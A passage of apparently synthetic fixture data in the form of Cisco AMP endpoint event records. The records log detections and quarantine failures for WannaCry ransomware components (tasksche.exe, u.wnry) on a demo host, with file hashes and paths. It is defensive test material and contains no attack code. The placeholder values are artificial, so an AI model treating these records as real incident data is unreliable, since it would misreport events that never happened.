pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":364000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":878000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":754000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":568000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":537000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 